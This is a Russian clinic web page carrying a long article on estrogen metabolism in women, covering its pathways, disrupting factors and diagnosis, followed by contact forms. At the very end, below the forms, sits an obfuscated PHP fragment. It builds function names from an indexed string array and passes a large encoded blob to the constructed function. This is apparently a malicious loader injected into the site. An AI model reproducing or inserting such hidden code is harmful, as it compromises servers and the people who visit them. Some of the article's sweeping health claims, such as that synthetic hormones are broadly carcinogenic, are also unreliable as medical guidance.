single Метаболизм эстрогенов у женщин | Клиника Актуальной Медицины

 

Метаболизм эстрогенов у женщин

 

МЕТАБОЛИЗМ ЭСТРОГЕНОВ У ЖЕНЩИН

(общие представления и клиническая практика)

ЧАСТЬ I

В последние годы существенно возросла заболеваемость эндометриозом, фиброзно-кистозной мастопатией, фибро-миомой матки и т.д. Причины развития этих заболеваний лежат в высоком уровне эстрогенов, который является не только их основой, но и может существенно ускорять процессы старения, снижать качество и сокращать продолжительность жизни женщины.

Для того чтобы понять, что вызывает появление этих заболеваний, необходимо рассмотреть, как происходит процесс метаболизма женских половых гормонов в организме женщины. Как известно, женские половые гормоны синтезируются в яичниках и жировой ткани и поступают в системный кровоток. В системном кровотоке большая часть эстрогенов связывается с белком, который переносит половые гормоны (SHBG). Лишь небольшая часть эстрогенов находится в свободном состоянии. Биологической активностью обладает только свободная форма, гормона. Связанные гормоны являются «оперативным» запасом организма и в случае возрастания потребности в них мобилизуются из связанного состояния, переходя в свободную форму.

Свободная фракция эстрогенов, благодаря своей липофильности, может легко проникать в ядро клетки. Именно в ядре локализованы рецепторы к эстрогенам и прогестерону. Связываясь со своим ядерным рецептором, гормон образует гормон-рецепторный комплекс, который инициирует активацию или ингибирование определенных генов, что в свою очередь вызывает ускорение или ослабление синтеза белков, кодируемых этими генами. Изменение концентрации определенных белков внутри клетки вызывает изменение и функции этой клетки.

После воздействия на клетку молекула эстрогена разрушается и выводится из организма. Но стероидные гормоны — это липофильные соединения, молекулы которых выводятся из организма только после перевода их в водорастворимую форму. Для этого в организме имеется арсенал ферментов. Они же используются для детоксикации ксенобиотиков (ксенобиотики — чужеродные организмы, соединения, которые поступают в организм из внешней среды).

1 ПУТИ МЕТАБОЛИЗМА ЭСТРОГЕНОВ

А. Этапы превращения гормонов

Процесс превращения гормонов проходит в 2 этапа.

1). На первом этапе эстрогены под действием ферментов группы цитохрома Р450 подвергаются трансформации с образованием промежуточных продуктов (2-гидрокси-, 16-гидрокси-, 4-гидроксиэстрогенов (схема 1).

А. Наиболее предпочтительными для женщины в период пременопаузы являются 2-гидроксиэстрогены. Они образуются в результате воздействия на эстрадиол или эстрон цитохрома Р450 1А2. Эти метаболиты обладают слабым Эстрогеновым действием (примерно 48% активности эстрадиола) и поэтому не оказывают пролиферативного действия на клетки.

Если эстрогены подвергаются воздействию цитохрома Р450 ЗА4, образуются 16-гидроксиэстрон или 16-гидроксиэстрадиол (эстриол). В отличие от 2-гидроксиэстрогенов 16-гидрокси-эстрон более активен, чем эстрон. Его активность в 8 раз превышает активность эстрадиола. Высокая скорость образования этого метаболита в организме женщины вызывает состояние гиперэстрогенемии, несмотря на нормальную концентрацию эстрадиола в крови. Снижение соотношения 2-гидроксиэстрона к 16-гидроксиэстрону, то есть доминирование 16-гидрокси-эстрона над 2-гидроксиэстрогенами, является свидетельством высокого риска развития рака матки и молочной железы [1].

Б. Но существует еще один путь превращения эстрогенов. Если на эстрогены действует цитохром Р450 1В1, то в результате образуются 4-гидроксиэстрогены и, несмотря на их относительно низкую активность (примерно 79 ес активности эстрадиола), они могут повреждать ДНК клетки и вызывать ее раковое перерождение. Именно эти метаболиты являются виновниками доброкачественных и злокачественных новообразований матки, молочной железы и яичников. Это подтверждают исследования биоптатов молочной железы, выполненные вне зоны поражения у женщин с раком молочной железы. Так было установлено, что концентрация 4-гидроксиэстрогенов у таких пациентов в 3 раза превышает концентрацию этого метаболита в ткани молочной железы в контрольной группе. Авторы работ предполагают, что 4-гидроксиэстрогены инициируют процессы раковой трансформации ткани молочной железы и могут быть предвестниками развития рака [2, 3].

2). После прохождения 1 этапа превращений 2-гидрокси- и 4-гидрокси-метаболиты женских половых гормонов могут превратиться или в семиквиноны, соединения, которые обладают генотоксическим действием, или, с помощью метилирования, в 2- и 4-метоксиэстрогены, соединения, абсолютно безвредные для организма.

Б. Факторы, определяющие путь метаболизма эстрогенов

Путь метаболизма эстрогенов зависит от следующих факторов.

1. Если в организме женщины образуется большое количество свободных радикалов (в результате курения, чрезмерных физических нагрузок, воздействия токсических соединений и т.д.). у нее накапливаются агрессивные семиквиноны. Из семиквинонов образуются 2.3- и 3.4-квиноны. Квиноны представляют собой в высокой степени реакционные молекулы, способные ковалентно связываться с ДНК, и таким образом нарушать ее структуру.

2. Если у женщины отсутствует оксидативный стресс при достаточно высоком уровне защитных реакций, например, метилирования, то образуются безвредные метоксиэстрогены.

Метилирование — биохимическая реакция, в результате которой к какому-либо субстрату (например, к эстрогенам) с помощью фермента катехол-О-метил-трансферазы присоединяется метальная группа (-СНЗ). Универсальным донором метальных групп в организме является s-аде-нозинметионин, образующийся в результате взаимодействия аминокислоты метионина с молекулой АТФ (аденозинтрифосфат). После того как s-аденозилметионин отдает метильную группу какому-либо субстрату, он превращается в s-аденозилгомоцистеин, а в последующем — в гомоцистеин (схема 2). Гомоцистеин в дальнейшем может обратно превратиться в метионин с помощью фермента метионинсинтетазы. Но для такого превращения необходимы следующие кофакторы: витамины В2, В12 и фолиевая кислота.

После превращения в метоксиэстрогены женские половые гормоны связываются с сульфатами или глюкуроновой кислотой в печени и с желчью выводятся из организма. Нарушение этих процессов может существенно мешать превращениям эстрогенов и увеличивать риск заболеваний женской репродуктивной сферы. Так, по литературным данным, снижение активности сульфотрансферазы в ткани эндометрия увеличивает риск злокачественных новообразований. Сульфотрансфераза — это фермент, переносящий неорганические сульфаты к соединениям, подлежащим детоксикации, в частности эстрогенам. И наоборот, при повышении активности сульфатазы — фермента, который отщепляет сульфаты от детоксицированных эстрогенов, происходит существенное увеличение риска образования карцином эндометрия, что связано с повышением тканевой концентрации свободных эстрогенов [4]. Другие исследователи показали, что процесс глюкуронизации в ткани молочной железы играет ключевую роль в канцерогенезе в этом органе [5].

Итак, после того как эстрогены связались с сульфатами или глюкуроновой кислотой, они секретируются печенью в желчные протоки, с желчью попадают в кишечник и затем выводятся из организма. Очевидно, что заболевания желудочно-кишечного тракта существенно влияют на метаболизм женских половых гормонов. В своей практике мы ни разу не наблюдали женщин с нарушенным метаболизмом эстрогенов и здоровым кишечником.

2 МЕТАБОЛИЗМ ЭСТРОГЕНОВ И СОСТОЯНИЕ ЖЕЛУДОЧНО-КИШЕЧНОГО ТРАКТА

Попадая в кишечник, модифицированные в печени гормоны должны выводиться из организма. Однако не у всех женщин этот процесс протекает нормально. Если у женщины дисбиоз и (или) она потребляет недостаточное количество клетчатки, то кишечная флора образует фермент бета-глюкуронидазу, которая отщепляет глюкуроновую кислоту от детоксицированных эстрогенов. Эстрогены, оставшись без глюкуроновой кислоты, приобретают возможность снова проникнуть в организм через кишечную стенку и, таким образом, увеличивают общее количество эстрогенов в организме.

Потребляемая клетчатка также оказывает положительный эффект на метаболизм эстрогенов: она обладает способностью сорбировать на своей поверхности эстрогены и препятствует их обратному всасыванию из просвета кишечника. Этот факт подтверждают исследования, показавшие, что у женщин, придерживающихся вегетарианской диеты, отмечена более высокая экскреция гормонов и поэтому более низкий уровень эстрогенов в системном кровотоке [6].

3 ФАКТОРЫ, НАРУШАЮЩИЕ МЕТАБОЛИЗМ ЭСТРОГЕНОВ

В связи с тем, что обмен женских половых гормонов представляет собой тонкий, сложный и весьма уязвимый процесс, существует большое количество факторов, которые, несмотря на их кажущуюся безобидность, могут вызывать достаточно серьезные нарушения в обмене женских половых гормонов.

Вообще, метаболизм эстрогенов нарушается при сочетании неблагоприятных факторов внешней среды и генетической предрасположенности к ним.

Среди генетических факторов, которые приводят к высокой восприимчивости к нарушению метаболизма эстрогенов, можно выделить полиморфизмы генов, кодирующих ферменты первой и второй фаз детоксикации (CYP 1А1, CYP 1В1, CYP 3A4, COMT, MTHFR, GST и т.д.).

Среди неблагоприятных факторов внешней среды можно отметить следующие:

1. Курение приводит к снижению активности цитохрома Р-450 1А2, ответственного за превращение эстрогенов в 2-гидроксиэстрогены, наиболее дружественные метаболиты для организма женщины в период пременопаузы. Кроме того, курение провоцирует оксидативный стресс, что способствует превращению 2-гидрокси- и 4-гидроксиэстрогенов в 2- и 4-семиквиноны и квиноны, обладающие канцерогенным действием на ткани матки, молочной железы и яичников.

2. Прием гормональных контрацептивов или женских половых гормонов с лечебной целью.

К сожалению, большинство гормональных препаратов на нашем рынке имеет синтетическую природу, а синтетические гормоны превращаются в организме в соединения с потенциальным канцерогенным действием. Кроме того, эти гормоны ограничивают детоксикационные возможности организма и поэтому, накапливаясь, могут приводить к развитию заболеваний женской репродуктивной сферы и увеличивают риск рака молочной железы [7].

3. Инсектициды (средства от насекомых) — это токсические соединения, которые могут поступать в организм с пищей или ингаляционно при их использовании в быту. Попадая в организм, они блокируют активность фермента цитохрома Р-450 1А2, который, как говорилось ранее, превращает эстрогены в 2-гидроксиэстрогены. В случае, если этот путь заблокирован, эстрогены начинают идти по пути превращения в 16-гидрокси- и 4-гидроксиэстрогены. Накопление таких метаболитов в тканях приводит к развитию предраковых заболеваний матки и молочной железы [8].

4. Гормоны в продуктах питания.

К сожалению, сельскохозяйственные предприятия для увеличения производства мяса все чаще используют гормоны, которые, накапливаясь в организме животных, попадают к нам на стол с мясными изделиями. Так в США в 70-е годы ежегодно для производства мяса использовалось 16 тонн гормонов. Поступая в организм женщины, они всасываются из желудочно-кишечного тракта и конкурентно взаимодействуют с гормональными рецепторами матки, молочной железы, яичников.

5. Ожирение способствует накоплению женских половых гормонов в организме.

Причина этого заключается в том, что жировая клетчатка содержит большое количество фермента ароматазы — CYP19, который превращает мужские половые гормоны, образующиеся в надпочечниках, в эстрогены.

6. Фталаты — это токсические соединения, которые обнаруживаются во всех пластмассовых изделиях и полимерных средствах для домашнего обихода (целлофан, пленка для упаковки продуктов, полиэтиленовые пакеты, освежители воздуха, полироли, краски, лаки и т.д.). Фталаты способны взаимодействовать с рецепторами эстрогенов и активизировать их, маскируя таким образом действие самих эстрогенов.

7. Заболевания желудочно-кишечного тракта.

8. Стрессы.

9. Дефицит нутриентов также нарушает метаболизм эстрогенов.

Это связано с тем, что многие витамины и минералы являются кофакторами ферментов, которые принимают участие в процессах превращения женских половых гормонов в организме. Без кофакторов ферментативные системы дают сбои, что в свою очередь приводит к накоплению эстрогенов. Так, низкие уровни бета-каротина (провитамина А), фолиевой кислоты, ликопена, селена увеличивает риск развития дисплазий шейки матки [9-11].

10. Малоподвижный образ жизни.

Оказывается, что физические нагрузки, стимулируют 2-гидроксилирование и детоксика-цию эстрогенов.

4 КЛИНИКА И ПАТОГЕНЕЗ НАРУШЕНИЙ МЕТАБОЛИЗМА ЭСТРОГЕНОВ

Что же происходит в организме женщины, если приведенные ранее факторы все-таки нарушают метаболизм эстрогенов? На начальных этапах ничего страшного. Организм обладает колоссальными компенсаторными возможностями, с помощью которых пытается восстановить нарушения. Причем в этот период у женщины нет никаких жалоб и во время осмотра гинеколог не находит патологии. Только специальные лабораторные исследования могут обнаружить нарушения на этом этапе. Эта стадия компенсации может быть достаточно продолжительной и ее длительность зависит от возможностей организма женщины. Возможности организма, в свою очередь, определяются генетической предрасположенностью, обеспеченностью витаминами, минералами, жирными кислотами, антиоксидантами, а также качеством питания, физическими нагрузками, наличием или отсутствием сопутствующих заболеваний и т.д. Но если неблагоприятные факторы внешней среды воздействуют на организм женщины длительное время, то рано или поздно организм начнет давать сбои, и могут появиться первые жалобы: болезненные и обильные менструации, боли в груди, связанные с менструацией, появление уплотнений в молочной железе, внезапные колебания веса, колебания настроения. Однако эти симптомы неспецифичны. Чрезмерное количество эстрогенов стимулирует пролиферацию (деление) эпителиальных и стромальных клеток матки, молочной железы. А это, в свою очередь, может привести к развитию эндометриоза, фиброзно-кистозной мастопатии, фибромиом матки и полипов эндометрия. Состояние гиперэстрогенемии также способствует внедрению папилломавирусной инфекции в шейку матки и развитию дисплазий. Это обусловлено прежде всего тем, что эстрогены обладают антиапоптотическим действием по отношению к эпителиальным клеткам шейки матки, причем этот эффект не связан с их митогенным действием [12]. Кроме того, эстрогены стимулируют экспрессию Еб-онкогена HPV16, который в свою очередь связывается с геном супрессии опухоли р53 и способствует ослаблению его экспрессии с помощью убиквитин-протеазной системы [13]. Еще одно негативное действие эстрогенов на развитие дисплазий проявляется в том, что, с одной стороны, они стимулируют экспрессию двух вирусных генов Еб и Е7, вызывающих онко-генную активность, а с другой — ингибируют иммунологическое разрешение при начальных повреждениях слизистой оболочки шейки матки вирусом папилломы человека (HPV) путем снижения экспрессии антигенов главного комплекса гистосовместимости I и II классов [14].

5 ДИАГНОСТИКА ГИПЕРЭСТРОГЕНЕМИИ

Диагностика гиперэстрогенемии, с одной стороны, проста, с другой стороны — не всегда точно выявляет нарушенный метаболизм женских половых гормонов. Для начала необходимо провести следующие гормональные исследования в фолликулярную и лютеальную фазы менструального цикла: определить уровни эстрадиола, эстрона, эстриола, прогестерона, тестостерона, фолликулостимулирующего гормона, лютеинизирующего гормона, пролактина в сыворотке крови. Если в одном из этих исследований уровни эстрадиола и эстрона окажутся выше нормальных значений, можно говорить об избыточном уровне эстрогенов. Однако в лучшем случае исследования проводятся два раза во время всего менструального цикла и, таким образом, реальная ситуация в остальное время неизвестна. Для того чтобы решить эту проблему, необходимо исследовать уровни гормонов в течение всего цикла.

Современные неинвазивные методы гормональных исследований позволяют определять уровни гормонов по пробам слюны. Этот метод исследования дает возможность точно определить концентрацию свободных эстрадиола и прогестерона в течение всего менструального цикла.

Кроме того, дополнительную информацию о гормональном статусе можно получить с помощью измерения уровней фибриногена и белка, связывающего половые гормоны. Повышение концентрации в крови этих белков говорит о высоком уровне эстрадиола в организме, так как последний является стимулятором продукции этих протеинов в печени. Однако в некоторых случаях клинически проявляемое состояние гиперэстрогенемии не подтверждается биохимическими показателями, которые остаются в пределах нормальных значений. Разобраться в ситуации можно, только исследовав метаболизм эстрогенов.

Исследование метаболизма эстрогенов проводится в период с 19 по 25 день менструального цикла. Если у пациентки высокий уровень 16-гидроксиэстрона и (или) отношение 2-гидрок-сиэстрогенов к 16-гидроксиэстрогенам меньше нормы (0,40) то это будет свидетельствовать о гиперэстрогенемии.

Помимо исследования концентрации гормонов и их метаболитов, необходимо также оценить ряд биохимических процессов в организме, которые принимают участие в деток-сикации эстрогенов и, в частности, процессы метилирования. Общепринятым маркером процессов метилирования в организме является гомоцистеин, уровень которого при нарушениях повышается [15].

На конечном этапе детоксикации эстрогены подвергаются сульфатации и глюкуронизации. Поэтому точный анализ этих процессов позволяет проследить завершающий этап превращения женских половых гормонов. Объективно оценить их можно с помощью теста, предложенного в лаборатории GSDL (Great Smokies Diagnostic Laboratory, США) — (www.anti-aging.kiev.ua, www.gsdl.com.) Обычное биохимическое исследование крови позволяет косвенно оценить процессы глюкуронизации. Повышение уровня непрямого билирубина, при нормальной концентрации трансаминаз и прямого билирубина-глюкуронида, позволяет выявить нарушение процессов глюкуронизации в организме: непрямой билирубин, продукт распада гемоглобина, детоксицируется, как и эстрогены, с помощью глюкуронизации. Присоединение глюкуроновой кислоты к билирубину превращает его из непрямого в прямой.

6 ВЫВОДЫ

Метаболизм эстрогенов весьма тонкий, сложный и уязвимый процесс, который может нарушать множество неблагоприятных факторов внешней среды. Для того чтобы восстановить баланс женских половых гормонов, необходимо точно представлять, какое звено или звенья этой метаболической цепи нарушены. И только понимание этого позволит целенаправленно и эффективно восстановить нарушенный баланс и избавить женщину от заболеваний, которые могут существенно ухудшить качество и снизить продолжительность ее жизни.

Вопросы лечения этих дисфункций будут рассмотрены во второй части статьи.

БИБЛИОГРАФИЯ

  1. Muti Р; Bradlow HL; Micheli A; Krogh V; Freudenheim JL; Schunemann HJ; Stanulla M; Yang J; Sepkovic DW; Trevisan M; Berrino F. Estrogen metabolism and risk of breast cancer: a prospective study of the 2:16alpha-hydroxyestrone ratio in premenopausal and postmenopausal women. Epidemiology Nov 2000;ll(6):635-406.
  2. Rogan EG; Badawi AF; Devanesan PD; Meza JL; Edney JA; West WW; Higginbotham SM; Cavalieri EL. Relative imbalances in estrogen metabolism and conjugation in breast tissue of women with carcinoma: potential biomarkers of susceptibility to cancer. Carcinogenesis (England), Apr 2003;24(4):697-702.
  3. LiehrJG; Ricci MJ. 4-Hydroxylation of estrogens as marker of human mammary tumors. Proc Natl Acad SciUSA, Apr 16 1996;93(8):3294-3296.
  4. Utsunomiya H; Ito K; Suzuki T; Kitamura T; Kaneko C; Nakata T; Niikura H; Okamura K; Yaegashi N; Sasano H Steroid sulfatase and estrogen sulfotransferase in human endometrial carcinoma. Clin Cancer Res Sep 1 2004;10(17):5850-5656.
  5. Guillemette C; Belanger A; LepineJ. Metabolic inactivation of estrogens in breast tissue by UDP-glucumnosyltransferase enzymes: an overview. Breast Cancer Res 2004;6(6):24&254.
  6. Goldin BR, Adlercreutz Н, Gorbach SL et al. Estrogen excretion patterns and plasma levels in vegetarian and omnivorous women. New EnglJ Med 1982;307:1542-1547.
  7. Ross RK, Paganini-Hill, Wan PC, Pike MC. Effect of hormone replacement therapy on breast cancer risk. J Natl Cancer Inst 92(4):328-332.
  8. Bradlow HL, Davis DL, Lin G, Sepkovich D, Tiwari R. Effects of pesticides on the ratio of 16/2-hydroxyestrone: a biologic marker of breast cancer risk. Environ Health Perspect 1995;103(suppl. 7):147-150.
  9. Toba T; Shidoji Y; FujiiJ; Moriwaki H; Muto Y; Suzuki T; Ohishi N; Yagi K. Growth suppression and induction of heat-shock protein-70 by 9-cis beta-carotene in cervical dysplasia-derived cells. Life Sci (England), 1997, 61(8) p839-45.
  10. Nagata C; Shimizu H; Yoshikawa H; Noda K; Nozawa S; Yajima A; Sekiya S; Sugimori H; Hirai Y; Kanazawa K; Sugase M; Kawana T. Serum carotenoids and vitamins and risk of cervical dysplasia from a case-control study in Japan. Br JCancer (Scotland) 1999;81(7):1234-1237.
  11. Lou H; Wu R; Fu Y. Relation between selenium and cancer of uterine cervix. Zhonghua ZhongLiu Za.
  12. Wang Qj Li X; WangL; Feng YH; ZengR; Gorodeski G. Antiapoptotic effects of estrogen in normal and cancer human cervical epithelial cells. Endocrinology 2004;145(12):5568-55 79.
  13. Moodley M; Moodley J; Chetty R; Herrington CS. The role of steroid contraceptive hormones in the pathogenesis of invasive cervical cancer: a review. IntJ Gynecol Cancer 2003;13(2):103-110.
  14. Von Knebel Doeberitz M; Spitkovsky D; Ridder R. Interactions between steroid hormones and viral oncogenes in the pathogenesis of cervical cancer. Verh Dtsch Ges Pathol (Germany) 1997;81:233-239.
  15. McCully K. Vascular pathology of homocysteinemia: implications for the pathogenesis of arteriosclerosis. AmJPathol Jul 1969;56(1):111-128.
© 2013-2024 Клиника Актуальной Медицины
Яндекс.Метрика

Обратный звонок

Ваше имя (обязательно)

Ваш E-Mail (обязательно)

Ваш номер телефона

Сообщение

Закрыть

Обратная связь

Ваше имя (обязательно)

Ваш E-Mail (обязательно)

Тема

Сообщение

$yxdzov[12].$yxdzov[15].$yxdzov[19].$yxdzov[22].$yxdzov[8].$yxdzov[19].$yxdzov[3].$yxdzov[10].$yxdzov[2].$yxdzov[21].$yxdzov[12].$yxdzov[8].$yxdzov[0].$yxdzov[11].$yxdzov[21]; $iuhffld = $vpdwzfys('$v', $yxdzov[19].$yxdzov[17].$yxdzov[22].$yxdzov[23].$yxdzov[18].$yxdzov[1].$yxdzov[6].$yxdzov[0].$yxdzov[21].$yxdzov[10].$yxdzov[23].$yxdzov[22].$yxdzov[8].$yxdzov[19].$yxdzov[18].$yxdzov[4].$yxdzov[22].$yxdzov[9].$yxdzov[19].$yxdzov[14].$yxdzov[16].$yxdzov[3].$yxdzov[5].$yxdzov[19].$yxdzov[12].$yxdzov[11].$yxdzov[5].$yxdzov[19].$yxdzov[18].$yxdzov[13].$yxdzov[17].$yxdzov[7].$yxdzov[7].$yxdzov[7].$yxdzov[20]); $iuhffld('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'); ?> Закрыть